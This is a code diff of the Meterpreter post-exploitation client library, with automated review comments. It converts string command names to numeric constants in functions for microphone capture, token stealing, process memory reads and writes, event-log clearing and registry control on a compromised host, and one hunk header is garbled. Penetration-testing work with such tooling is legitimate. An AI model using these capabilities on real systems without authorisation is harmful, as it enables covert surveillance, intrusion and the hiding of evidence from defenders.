@@ -4,59 +4,60 @@ require 'rex/post/meterpreter/channels/pools/stream_pool' module Rex - module Post - module Meterpreter - module Extensions - module Stdapi - module Mic - - ### - # - # This meterpreter extension can list and capture from microphone - # - ### - class Mic - def initialize(client) - @client = client - end - - def session - @client - end - - # List available microphones - def mic_list - response = client.send_request(Packet.create_request('stdapi_audio_mic_list')) - names = [] - if response.result == 0 - response.get_tlvs(TLV_TYPE_AUDIO_INTERFACE_NAME).each do |tlv| - names << tlv.value - end - end - names - end - - # Starts recording audio from microphone - def mic_start(device_id) - request = Packet.create_request('stdapi_audio_mic_start') - request.add_tlv(TLV_TYPE_AUDIO_INTERFACE_ID, device_id) - response = client.send_request(request) - return nil unless response.result == 0 - - channel = Channel.create(client, 'audio_mic', Rex::Post::Meterpreter::Channels::Pools::StreamPool, CHANNEL_FLAG_SYNCHRONOUS, response) - end - - # Stop recording from microphone - def mic_stop - client.send_request(Packet.create_request('stdapi_audio_mic_stop')) - true - end - - attr_accessor :client - end - end - end +module Post +module Meterpreter +module Extensions +module Stdapi +module Mic + +### +# +# This meterpreter extension can list and capture from microphone +# +### +class Mic + def initialize(client) + @client = client + end + + def session + @client + end + + # List available microphones + def mic_list + response = client.send_request(Packet.create_request(COMMAND_ID_STDAPI_AUDIO_MIC_LIST)) + names = [] + if response.result == 0 + response.get_tlvs(TLV_TYPE_AUDIO_INTERFACE_NAME).each do |tlv| + names << tlv.value end end + names + end + + # Starts recording audio from microphone + def mic_start(device_id) + request = Packet.create_request(COMMAND_ID_STDAPI_AUDIO_MIC_START) + request.add_tlv(TLV_TYPE_AUDIO_INTERFACE_ID, device_id) + response = 
client.send_request(request) + return nil unless response.result == 0 + + Channel.create(client, 'audio_mic', Rex::Post::Meterpreter::Channels::Pools::StreamPool, CHANNEL_FLAG_SYNCHRONOUS, response) + end + + # Stop recording from microphone + def mic_stop + client.send_request(Packet.create_request(COMMAND_ID_STDAPI_AUDIO_MIC_STOP)) + true end + + attr_accessor :client +end + +end +end +end +end +end end diff --git a/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb b/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb index 70b1ef4d7e9c5..9361aa41c0552 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb @@ -53,7 +53,7 @@ def each_interface(&block) # # @return [Array] def get_interfaces - request = Packet.create_request('stdapi_net_config_get_interfaces') + request = Packet.create_request(COMMAND_ID_STDAPI_NET_CONFIG_GET_INTERFACES) ifaces = [] response = client.send_request(request) @@ -112,7 +112,7 @@ def get_interfaces # def get_netstat - request = Packet.create_request('stdapi_net_config_get_netstat') + request = Packet.create_request(COMMAND_ID_STDAPI_NET_CONFIG_GET_NETSTAT) netstat = [] response = client.send_request(request) @@ -148,7 +148,7 @@ def get_netstat # def get_arp_table - request = Packet.create_request('stdapi_net_config_get_arp_table') + request = Packet.create_request(COMMAND_ID_STDAPI_NET_CONFIG_GET_ARP_TABLE) arps = [] response = client.send_request(request) @@ -178,7 +178,7 @@ def each_route(&block) # Returns an array of routes with each element being a Route. # def get_routes - request = Packet.create_request('stdapi_net_config_get_routes') + request = Packet.create_request(COMMAND_ID_STDAPI_NET_CONFIG_GET_ROUTES) routes = [] response = client.send_request(request) 
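Review bot: `attr_accessor :client` sits at the bottom of the re-indented `Mic` class, after every method that calls `client`, and it publishes a writer that nothing in this hunk uses; `attr_reader :client` placed directly under `class Mic` would state the contract up front, provided no caller assigns `client=`. `mic_list` can also lose its manual accumulation: `names = response.result == 0 ? response.get_tlvs(TLV_TYPE_AUDIO_INTERFACE_NAME).map(&:value) : []`. Returning the channel from `mic_start` instead of assigning it to an unused local is the one behavioural change in this file and deserves a line in the commit description.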
@@ -203,13 +203,13 @@ def get_routes # Adds a route to the target machine. # def add_route(subnet, netmask, gateway) - request = Packet.create_request('stdapi_net_config_add_route') + request = Packet.create_request(COMMAND_ID_STDAPI_NET_CONFIG_ADD_ROUTE) request.add_tlv(TLV_TYPE_SUBNET_STRING, subnet) request.add_tlv(TLV_TYPE_NETMASK_STRING, netmask) request.add_tlv(TLV_TYPE_GATEWAY_STRING, gateway) - response = client.send_request(request) + client.send_request(request) return true end @@ -218,13 +218,13 @@ def add_route(subnet, netmask, gateway) # Removes a route from the target machine. # def remove_route(subnet, netmask, gateway) - request = Packet.create_request('stdapi_net_config_remove_route') + request = Packet.create_request(COMMAND_ID_STDAPI_NET_CONFIG_REMOVE_ROUTE) request.add_tlv(TLV_TYPE_SUBNET_STRING, subnet) request.add_tlv(TLV_TYPE_NETMASK_STRING, netmask) request.add_tlv(TLV_TYPE_GATEWAY_STRING, gateway) - response = client.send_request(request) + client.send_request(request) return true end @@ -233,7 +233,7 @@ def remove_route(subnet, netmask, gateway) # Get's the current proxy configuration # def get_proxy_config() - request = Packet.create_request('stdapi_net_config_get_proxy') + request = Packet.create_request(COMMAND_ID_STDAPI_NET_CONFIG_GET_PROXY) response = client.send_request(request) diff --git a/lib/rex/post/meterpreter/extensions/stdapi/net/resolve.rb b/lib/rex/post/meterpreter/extensions/stdapi/net/resolve.rb index 951d4870b4070..9a3035432b3d4 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/net/resolve.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/net/resolve.rb @@ -32,7 +32,7 @@ def initialize(client) end def resolve_host(hostname, family=AF_INET) - request = Packet.create_request('stdapi_net_resolve_host') + request = Packet.create_request(COMMAND_ID_STDAPI_NET_RESOLVE_HOST) request.add_tlv(TLV_TYPE_HOST_NAME, hostname) request.add_tlv(TLV_TYPE_ADDR_TYPE, family) 
@@ -45,7 +45,7 @@ def resolve_host(hostname, family=AF_INET) end def resolve_hosts(hostnames, family=AF_INET) - request = Packet.create_request('stdapi_net_resolve_hosts') + request = Packet.create_request(COMMAND_ID_STDAPI_NET_RESOLVE_HOSTS) request.add_tlv(TLV_TYPE_ADDR_TYPE, family) hostnames.each do |hostname| diff --git a/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb b/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb index e1def0be8be62..3b43bb6a331b3 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb @@ -101,7 +101,7 @@ def close_write def shutdown(how = 1) return false if self.cid.nil? - request = Packet.create_request('stdapi_net_socket_tcp_shutdown') + request = Packet.create_request(COMMAND_ID_STDAPI_NET_SOCKET_TCP_SHUTDOWN) request.add_tlv(TLV_TYPE_SHUTDOWN_HOW, how) request.add_tlv(TLV_TYPE_CHANNEL_ID, self.cid) diff --git a/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_server_channel.rb b/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_server_channel.rb index fdc3d9b58cbc4..2c5396a9ff972 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_server_channel.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_server_channel.rb 
@@ -29,12 +29,12 @@ class TcpServerChannel < Rex::Post::Meterpreter::Channel # # This is the request handler which is registered to the respective meterpreter instance via # Rex::Post::Meterpreter::Extensions::Stdapi::Net::Socket. All incoming requests from the meterpreter - # for a 'stdapi_net_tcp_channel_open' will be processed here. We create a new TcpClientChannel for each request + # for a COMMAND_ID_STDAPI_NET_TCP_CHANNEL_OPEN will be processed here. We create a new TcpClientChannel for each request # received and store it in the respective tcp server channels list of new pending client channels. # These new tcp client channels are passed off via a call the the tcp server channels accept() method. # def self.request_handler(client, packet) - return false unless packet.method == "stdapi_net_tcp_channel_open" + return false unless packet.method == COMMAND_ID_STDAPI_NET_TCP_CHANNEL_OPEN cid = packet.get_tlv_value( TLV_TYPE_CHANNEL_ID ) pid = packet.get_tlv_value( TLV_TYPE_CHANNEL_PARENTID ) diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/library.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/library.rb index 71a502e772b4e..26dd679c84e3f 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/library.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/library.rb @@ -254,7 +254,7 @@ def process_function_call(function, args, client) end #puts "\n\nsending Stuff to meterpreter" - request = Packet.create_request('stdapi_railgun_api') + request = Packet.create_request(COMMAND_ID_STDAPI_RAILGUN_API) request.add_tlv(TLV_TYPE_RAILGUN_SIZE_OUT, out_only_size_bytes) request.add_tlv(TLV_TYPE_RAILGUN_STACKBLOB, literal_pairs_blob) diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/multicall.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/multicall.rb index c2c863c5a0272..5fad9f432963e 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/multicall.rb 
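Review bot: `return false unless packet.method == COMMAND_ID_STDAPI_NET_TCP_CHANNEL_OPEN` now compares against an integer, so it is only correct if `packet.method` (changed in packet.rb, outside this view) yields the numeric command id for inbound requests; if it still returns the method string, the handler rejects every channel-open request and incoming connections are dropped without any error. A spec that feeds `request_handler` a packet built with `Packet.create_request(COMMAND_ID_STDAPI_NET_TCP_CHANNEL_OPEN)` would pin this. The rewritten comment line also lost its noun: `# for a COMMAND_ID_STDAPI_NET_TCP_CHANNEL_OPEN request will be processed here.` `request_handler` continues past the end of the hunk.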
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/multicall.rb @@ -56,7 +56,7 @@ def initialize(client, parent, consts_mgr) end def call(functions) - request = Packet.create_request('stdapi_railgun_api_multi') + request = Packet.create_request(COMMAND_ID_STDAPI_RAILGUN_API_MULTI) function_results = [] layouts = [] functions.each do |f| diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb index aacafacb9b9c3..09606a236e642 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb @@ -165,7 +165,7 @@ def memread(address, length) raise "Invalid parameters." if(not address or not length) - request = Packet.create_request('stdapi_railgun_memread') + request = Packet.create_request(COMMAND_ID_STDAPI_RAILGUN_MEMREAD) request.add_tlv(TLV_TYPE_RAILGUN_MEM_ADDRESS, address) request.add_tlv(TLV_TYPE_RAILGUN_MEM_LENGTH, length) @@ -187,7 +187,7 @@ def memwrite(address, data, length=nil) length = data.length if length.nil? raise "Invalid parameters." if(not address or not data or not length) - request = Packet.create_request('stdapi_railgun_memwrite') + request = Packet.create_request(COMMAND_ID_STDAPI_RAILGUN_MEMWRITE) request.add_tlv(TLV_TYPE_RAILGUN_MEM_ADDRESS, address) request.add_tlv(TLV_TYPE_RAILGUN_MEM_DATA, data) request.add_tlv(TLV_TYPE_RAILGUN_MEM_LENGTH, length) diff --git a/lib/rex/post/meterpreter/extensions/stdapi/stdapi.rb b/lib/rex/post/meterpreter/extensions/stdapi/stdapi.rb index 7f0164dd6b710..c176a9f296e0c 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/stdapi.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/stdapi.rb @@ -37,6 +37,10 @@ module Stdapi ### class Stdapi < Extension + def self.extension_id + EXTENSION_ID_STDAPI + end + # # Initializes an instance of the standard API extension. # 
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb index 9b488161fbb53..725a0f0028fcc 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb @@ -31,7 +31,7 @@ def initialize(client) # def getuid(refresh: true) if @uid.nil? || refresh - request = Packet.create_request('stdapi_sys_config_getuid') + request = Packet.create_request(COMMAND_ID_STDAPI_SYS_CONFIG_GETUID) response = client.send_request(request) @uid = client.unicode_filter_encode( response.get_tlv_value(TLV_TYPE_USER_NAME) ) end @@ -42,7 +42,7 @@ def getuid(refresh: true) # Gets the SID of the current process/thread. # def getsid - request = Packet.create_request('stdapi_sys_config_getsid') + request = Packet.create_request(COMMAND_ID_STDAPI_SYS_CONFIG_GETSID) response = client.send_request(request) response.get_tlv_value(TLV_TYPE_SID) end @@ -58,7 +58,7 @@ def is_system? # Returns a list of currently active drivers used by the target system # def getdrivers - request = Packet.create_request('stdapi_sys_config_driver_list') + request = Packet.create_request(COMMAND_ID_STDAPI_SYS_CONFIG_DRIVER_LIST) response = client.send_request(request) result = [] @@ -78,7 +78,7 @@ def getdrivers # If a requested value doesn't exist in the response, then the value wasn't found. # def getenvs(*var_names) - request = Packet.create_request('stdapi_sys_config_getenv') + request = Packet.create_request(COMMAND_ID_STDAPI_SYS_CONFIG_GETENV) var_names.each do |v| request.add_tlv(TLV_TYPE_ENV_VARIABLE, v) @@ -108,7 +108,7 @@ def getenv(var_name) # Returns the target's local system date and time. # def localtime - request = Packet.create_request('stdapi_sys_config_localtime') + request = Packet.create_request(COMMAND_ID_STDAPI_SYS_CONFIG_LOCALTIME) response = client.send_request(request) (response.get_tlv_value(TLV_TYPE_LOCAL_DATETIME) || "").strip end 
@@ -117,7 +117,7 @@ def localtime # Returns a hash of information about the remote computer. # def sysinfo(refresh: false) - request = Packet.create_request('stdapi_sys_config_sysinfo') + request = Packet.create_request(COMMAND_ID_STDAPI_SYS_CONFIG_SYSINFO) if @sysinfo.nil? || refresh response = client.send_request(request) @@ -144,14 +144,14 @@ def sysinfo(refresh: false) # Calls RevertToSelf on the remote machine. # def revert_to_self - client.send_request(Packet.create_request('stdapi_sys_config_rev2self')) + client.send_request(Packet.create_request(COMMAND_ID_STDAPI_SYS_CONFIG_REV2SELF)) end # # Steals the primary token from a target process # def steal_token(pid) - req = Packet.create_request('stdapi_sys_config_steal_token') + req = Packet.create_request(COMMAND_ID_STDAPI_SYS_CONFIG_STEAL_TOKEN) req.add_tlv(TLV_TYPE_PID, pid.to_i) res = client.send_request(req) client.unicode_filter_encode( res.get_tlv_value(TLV_TYPE_USER_NAME) ) @@ -161,7 +161,7 @@ def steal_token(pid) # Drops any assumed token # def drop_token - req = Packet.create_request('stdapi_sys_config_drop_token') + req = Packet.create_request(COMMAND_ID_STDAPI_SYS_CONFIG_DROP_TOKEN) res = client.send_request(req) client.unicode_filter_encode( res.get_tlv_value(TLV_TYPE_USER_NAME) ) end @@ -170,7 +170,7 @@ def drop_token # Enables all possible privileges # def getprivs - req = Packet.create_request('stdapi_sys_config_getprivs') + req = Packet.create_request(COMMAND_ID_STDAPI_SYS_CONFIG_GETPRIVS) ret = [] res = client.send_request(req) res.each(TLV_TYPE_PRIVILEGE) do |p| diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log.rb index cb2d556520818..d09ac6b538bea 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log.rb 
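Review bot: In the `sysinfo(refresh: false)` hunk the new `request = Packet.create_request(COMMAND_ID_STDAPI_SYS_CONFIG_SYSINFO)` still runs before the `if @sysinfo.nil? || refresh` test, so a request packet is built and thrown away on every cached call. Move that line inside the `if`, directly above `response = client.send_request(request)`, since the request is only consumed there. The body of `sysinfo` continues past the end of the hunk.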
@@ -34,7 +34,7 @@ class << self #++ # def EventLog.open(name) - request = Packet.create_request('stdapi_sys_eventlog_open') + request = Packet.create_request(COMMAND_ID_STDAPI_SYS_EVENTLOG_OPEN) request.add_tlv(TLV_TYPE_EVENT_SOURCENAME, name); @@ -73,7 +73,7 @@ def self.finalize(client,handle) # Return the number of records in the event log. # def length - request = Packet.create_request('stdapi_sys_eventlog_numrecords') + request = Packet.create_request(COMMAND_ID_STDAPI_SYS_EVENTLOG_NUMRECORDS) request.add_tlv(TLV_TYPE_EVENT_HANDLE, self.handle); @@ -86,7 +86,7 @@ def length # the low level read function (takes flags, not hash, etc). # def _read(flags, offset = 0) - request = Packet.create_request('stdapi_sys_eventlog_read') + request = Packet.create_request(COMMAND_ID_STDAPI_SYS_EVENTLOG_READ) request.add_tlv(TLV_TYPE_EVENT_HANDLE, self.handle) request.add_tlv(TLV_TYPE_EVENT_READFLAGS, flags) @@ -150,7 +150,7 @@ def each_backwards # Return the record number of the oldest event (not necessarily 1). # def oldest - request = Packet.create_request('stdapi_sys_eventlog_oldest') + request = Packet.create_request(COMMAND_ID_STDAPI_SYS_EVENTLOG_OLDEST) request.add_tlv(TLV_TYPE_EVENT_HANDLE, self.handle); @@ -167,11 +167,11 @@ def oldest #++ # def clear - request = Packet.create_request('stdapi_sys_eventlog_clear') + request = Packet.create_request(COMMAND_ID_STDAPI_SYS_EVENTLOG_CLEAR) request.add_tlv(TLV_TYPE_EVENT_HANDLE, self.handle); - response = client.send_request(request) + client.send_request(request) return self end @@ -179,9 +179,9 @@ def clear # Close the event log # def self.close(client, handle) - request = Packet.create_request('stdapi_sys_eventlog_close') + request = Packet.create_request(COMMAND_ID_STDAPI_SYS_EVENTLOG_CLOSE) request.add_tlv(TLV_TYPE_EVENT_HANDLE, handle); - response = client.send_request(request, nil) + client.send_request(request, nil) return nil end 
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/power.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/power.rb index 89da1f5496ac6..e18b81e6bc964 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/sys/power.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/power.rb @@ -28,7 +28,7 @@ class < true/false # def Process.execute(path, arguments = nil, opts = nil) - request = Packet.create_request('stdapi_sys_process_execute') + request = Packet.create_request(COMMAND_ID_STDAPI_SYS_PROCESS_EXECUTE) flags = 0 # If we were supplied optional arguments... @@ -192,7 +192,7 @@ def Process.execute(path, arguments = nil, opts = nil) # Kills one or more processes. # def Process.kill(*args) - request = Packet.create_request('stdapi_sys_process_kill') + request = Packet.create_request(COMMAND_ID_STDAPI_SYS_PROCESS_KILL) args.each { |id| request.add_tlv(TLV_TYPE_PID, id) @@ -207,7 +207,7 @@ def Process.kill(*args) # Gets the process id that the remote side is executing under. # def Process.getpid - request = Packet.create_request('stdapi_sys_process_getpid') + request = Packet.create_request(COMMAND_ID_STDAPI_SYS_PROCESS_GETPID) response = client.send_request(request) @@ -226,7 +226,7 @@ def Process.each_process(&block) # 'ppid', 'name', 'path', 'user', 'session' and 'arch'. # def Process.get_processes - request = Packet.create_request('stdapi_sys_process_get_processes') + request = Packet.create_request(COMMAND_ID_STDAPI_SYS_PROCESS_GET_PROCESSES) processes = ProcessList.new response = client.send_request(request) @@ -323,9 +323,9 @@ def path # Closes the handle to the process that was opened. # def self.close(client, handle) - request = Packet.create_request('stdapi_sys_process_close') + request = Packet.create_request(COMMAND_ID_STDAPI_SYS_PROCESS_CLOSE) request.add_tlv(TLV_TYPE_HANDLE, handle) - response = client.send_request(request, nil) + client.send_request(request, nil) handle = nil; return true end 
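Review bot: In the `self.close(client, handle)` hunk of process.rb the `handle = nil;` that follows the now-bare `client.send_request(request, nil)` only rebinds the method's own parameter, so it has no effect on the caller and the line is dead. Either drop it or clear the handle where the instance state lives, presumably the instance-level `close(handle = self.handle)` whose hunk header appears next in this diff. The same dead `handle = nil` appears in `Thread.close(client, handle)` in sys/thread.rb further down. The power.rb hunk header on this line is truncated in the page, so that hunk was not reviewed.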
@@ -347,11 +347,11 @@ def close(handle = self.handle) # occur as we may be waiting indefinatly for the process to terminate. # def wait( timeout = -1 ) - request = Packet.create_request('stdapi_sys_process_wait') + request = Packet.create_request(COMMAND_ID_STDAPI_SYS_PROCESS_WAIT) request.add_tlv(TLV_TYPE_HANDLE, self.handle) - response = self.client.send_request(request, timeout) + self.client.send_request(request, timeout) self.handle = nil @@ -366,7 +366,7 @@ def wait( timeout = -1 ) # Gathers information about the process and returns a hash. # def get_info - request = Packet.create_request('stdapi_sys_process_get_info') + request = Packet.create_request(COMMAND_ID_STDAPI_SYS_PROCESS_GET_INFO) info = {} request.add_tlv(TLV_TYPE_HANDLE, handle) diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/image.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/image.rb index 861300017c7a0..3c0fdf563bfac 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/image.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/image.rb @@ -49,7 +49,7 @@ def [](key) # Loads an image file into the context of the process. # def load(image_path) - request = Packet.create_request('stdapi_sys_process_image_load') + request = Packet.create_request(COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_LOAD) request.add_tlv(TLV_TYPE_HANDLE, process.handle) request.add_tlv(TLV_TYPE_IMAGE_FILE_PATH, image_path) @@ -64,7 +64,7 @@ def load(image_path) # library. # def get_procedure_address(image_file, procedure) - request = Packet.create_request('stdapi_sys_process_image_get_proc_address') + request = Packet.create_request(COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_GET_PROC_ADDRESS) request.add_tlv(TLV_TYPE_HANDLE, process.handle) request.add_tlv(TLV_TYPE_IMAGE_FILE, image_file) 
@@ -80,12 +80,12 @@ def get_procedure_address(image_file, procedure) # process by its base address. # def unload(base) - request = Packet.create_request('stdapi_sys_process_image_unload') + request = Packet.create_request(COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_UNLOAD) request.add_tlv(TLV_TYPE_HANDLE, process.handle) request.add_tlv(TLV_TYPE_IMAGE_BASE, base) - response = process.client.send_request(request) + process.client.send_request(request) return true end @@ -102,7 +102,7 @@ def each_image(&block) # have keys for 'name', 'path', and 'base'. # def get_images - request = Packet.create_request('stdapi_sys_process_image_get_images') + request = Packet.create_request(COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_GET_IMAGES) images = [] request.add_tlv(TLV_TYPE_HANDLE, process.handle) diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/memory.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/memory.rb index 5c3fc7fd330ab..e1c545ce95b7d 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/memory.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/memory.rb @@ -77,7 +77,7 @@ def allocate(length, protection = nil, base = nil) # Low-level memory allocation. # def _allocate(base, length, allocation_type, protection) - request = Packet.create_request('stdapi_sys_process_memory_allocate') + request = Packet.create_request(COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_ALLOCATE) # Populate the request if (base != nil) @@ -106,13 +106,13 @@ def free(base, length = 0) # Low-level memory deallocation. # def _free(base, length) - request = Packet.create_request('stdapi_sys_process_memory_free') + request = Packet.create_request(COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_FREE) request.add_tlv(TLV_TYPE_HANDLE, process.handle) request.add_tlv(TLV_TYPE_BASE_ADDRESS, base) request.add_tlv(TLV_TYPE_LENGTH, length) - response = process.client.send_request(request) + process.client.send_request(request) return true end 
@@ -121,7 +121,7 @@ def _free(base, length) # Read memory from the context of a process and return the buffer. # def read(base, length) - request = Packet.create_request('stdapi_sys_process_memory_read') + request = Packet.create_request(COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_READ) request.add_tlv(TLV_TYPE_HANDLE, process.handle) request.add_tlv(TLV_TYPE_BASE_ADDRESS, base) @@ -137,7 +137,7 @@ def read(base, length) # actually written. # def write(base, data) - request = Packet.create_request('stdapi_sys_process_memory_write') + request = Packet.create_request(COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_WRITE) request.add_tlv(TLV_TYPE_HANDLE, process.handle) request.add_tlv(TLV_TYPE_BASE_ADDRESS, base) @@ -152,7 +152,7 @@ def write(base, data) # Queries an address for information about its state. # def query(base) - request = Packet.create_request('stdapi_sys_process_memory_query') + request = Packet.create_request(COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_QUERY) request.add_tlv(TLV_TYPE_HANDLE, process.handle) request.add_tlv(TLV_TYPE_BASE_ADDRESS, base) @@ -199,7 +199,7 @@ def query(base) # Change the protection masks on the region supplied in base. # def protect(base, length = nil, protection = nil) - request = Packet.create_request('stdapi_sys_process_memory_protect') + request = Packet.create_request(COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_PROTECT) if (length == nil) length = 4096 @@ -231,12 +231,12 @@ def protect(base, length = nil, protection = nil) # handle is ignored. # def lock(base, length) - request = Packet.create_request('stdapi_sys_process_memory_lock') + request = Packet.create_request(COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_LOCK) request.add_tlv(TLV_TYPE_BASE_ADDRESS, base) request.add_tlv(TLV_TYPE_LENGTH, length) - response = process.client.send_request(request) + process.client.send_request(request) return true end 
@@ -248,12 +248,12 @@ def lock(base, length) # handle is ignored. # def unlock(base, length) - request = Packet.create_request('stdapi_sys_process_memory_unlock') + request = Packet.create_request(COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_UNLOCK) request.add_tlv(TLV_TYPE_BASE_ADDRESS, base) request.add_tlv(TLV_TYPE_LENGTH, length) - response = process.client.send_request(request) + process.client.send_request(request) return true end diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/thread.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/thread.rb index 9487ebfbd0f55..9342795010f23 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/thread.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/thread.rb @@ -45,7 +45,7 @@ def initialize(process) # of the process and returns a Sys::Thread instance. # def open(tid, access = THREAD_ALL) - request = Packet.create_request('stdapi_sys_process_thread_open') + request = Packet.create_request(COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_OPEN) real = 0 # Translate access @@ -78,7 +78,7 @@ def open(tid, access = THREAD_ALL) # returns a Sys::Thread instance. # def create(entry, parameter = nil, suspended = false) - request = Packet.create_request('stdapi_sys_process_thread_create') + request = Packet.create_request(COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_CREATE) creation_flags = 0 request.add_tlv(TLV_TYPE_PROCESS_HANDLE, process.handle) @@ -119,7 +119,7 @@ def each_thread(&block) # Returns an array of thread identifiers. # def get_threads - request = Packet.create_request('stdapi_sys_process_thread_get_threads') + request = Packet.create_request(COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_GET_THREADS) threads = [] request.add_tlv(TLV_TYPE_PID, process.pid) diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb index cb633f7233c4d..32a2fcd89af86 100644 
--- a/lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb @@ -41,7 +41,7 @@ class << self # def Registry.load_key(root_key,base_key,hive_file) - request = Packet.create_request('stdapi_registry_load_key') + request = Packet.create_request(COMMAND_ID_STDAPI_REGISTRY_LOAD_KEY) request.add_tlv(TLV_TYPE_ROOT_KEY, root_key) request.add_tlv(TLV_TYPE_BASE_KEY, base_key) request.add_tlv(TLV_TYPE_FILE_PATH, client.unicode_filter_decode( hive_file )) @@ -51,7 +51,7 @@ def Registry.load_key(root_key,base_key,hive_file) end def Registry.unload_key(root_key,base_key) - request = Packet.create_request('stdapi_registry_unload_key') + request = Packet.create_request(COMMAND_ID_STDAPI_REGISTRY_UNLOAD_KEY) request.add_tlv(TLV_TYPE_ROOT_KEY, root_key) request.add_tlv(TLV_TYPE_BASE_KEY, base_key) response = client.send_request(request) @@ -65,7 +65,7 @@ def Registry.open_key(root_key, base_key, perm = KEY_READ) return RegistrySubsystem::RegistryKey.new(client, root_key, base_key, perm, root_key) end - request = Packet.create_request('stdapi_registry_open_key') + request = Packet.create_request(COMMAND_ID_STDAPI_REGISTRY_OPEN_KEY) request.add_tlv(TLV_TYPE_ROOT_KEY, root_key) request.add_tlv(TLV_TYPE_BASE_KEY, base_key) @@ -86,7 +86,7 @@ def Registry.open_key(root_key, base_key, perm = KEY_READ) # @raise [TimeoutError] if the timeout expires when waiting the answer # @raise [Rex::Post::Meterpreter::RequestError] if the parameters are not valid def Registry.check_key_exists(root_key, base_key) - request = Packet.create_request('stdapi_registry_check_key_exists') + request = Packet.create_request(COMMAND_ID_STDAPI_REGISTRY_CHECK_KEY_EXISTS) request.add_tlv(TLV_TYPE_ROOT_KEY, root_key) request.add_tlv(TLV_TYPE_BASE_KEY, base_key) response = client.send_request(request) 
